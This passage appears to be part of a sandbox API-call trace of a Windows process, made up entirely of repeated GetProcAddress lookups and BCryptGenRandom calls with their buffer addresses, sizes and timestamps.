dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0213.763] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.763] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0213.763] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.763] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0213.764] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.764] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0213.764] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.764] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0213.764] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.764] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0213.764] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.765] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0213.765] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.765] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0213.765] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.765] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0213.765] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.765] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0213.766] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.766] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0213.766] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.766] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0213.766] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.766] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0213.767] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.767] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0213.767] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.767] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0213.767] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.767] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0213.767] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.767] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0213.768] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.768] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0213.768] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.768] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0213.768] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.769] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0213.769] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.769] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0213.769] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.769] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0213.769] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.770] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0213.770] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.770] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0213.770] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.770] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0213.770] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.770] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0213.771] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.771] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a02280, cbBuffer=0x23, dwFlags=0x2 | out: pbBuffer=0x3a02280) returned 0x0 [0213.771] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.771] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0213.771] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.771] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0213.771] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.771] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0213.772] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.772] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0213.772] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.772] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0213.772] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.772] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0213.772] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.772] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0213.773] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.773] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0213.773] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.773] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0213.773] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.773] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0213.773] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.773] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0213.774] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.774] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0213.774] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.774] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0213.774] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.774] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0213.774] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.774] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0213.775] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.775] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0213.775] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.775] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0213.775] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.775] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0213.776] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.776] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0213.776] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.776] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0213.776] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.776] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0213.776] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.777] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0213.777] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.777] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0213.777] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.777] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0213.777] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.777] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0213.777] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.778] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0213.778] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.778] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a022a3, cbBuffer=0x27, dwFlags=0x2 | out: pbBuffer=0x3a022a3) returned 0x0 [0213.778] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.778] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0213.778] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.779] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0213.779] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.779] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0213.779] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.779] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0213.779] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.779] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0213.780] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.780] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0213.780] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.780] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0213.780] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.780] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0213.781] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.781] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0213.781] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.781] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0213.781] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.781] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0213.781] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.781] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0213.782] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.782] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0213.782] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.782] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0213.782] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.782] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0213.782] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.782] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0213.783] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.783] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0213.783] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.783] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0213.783] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.783] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0213.783] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.783] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0213.784] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.784] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0213.784] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.784] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0213.784] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.784] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0213.784] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.784] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0213.785] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.785] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0213.785] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.785] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0213.785] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.785] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0213.785] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.785] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0213.786] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.786] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0213.786] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.786] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0213.786] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.786] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0213.786] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.787] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0213.787] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.787] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a022ca, cbBuffer=0x28, dwFlags=0x2 | out: pbBuffer=0x3a022ca) returned 0x0 [0213.787] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.787] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0213.787] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.787] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0213.788] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.788] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0213.788] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.788] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0213.788] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.788] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0213.788] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.788] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0213.789] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.789] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0213.789] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.789] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0213.789] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0213.789] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0213.790] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 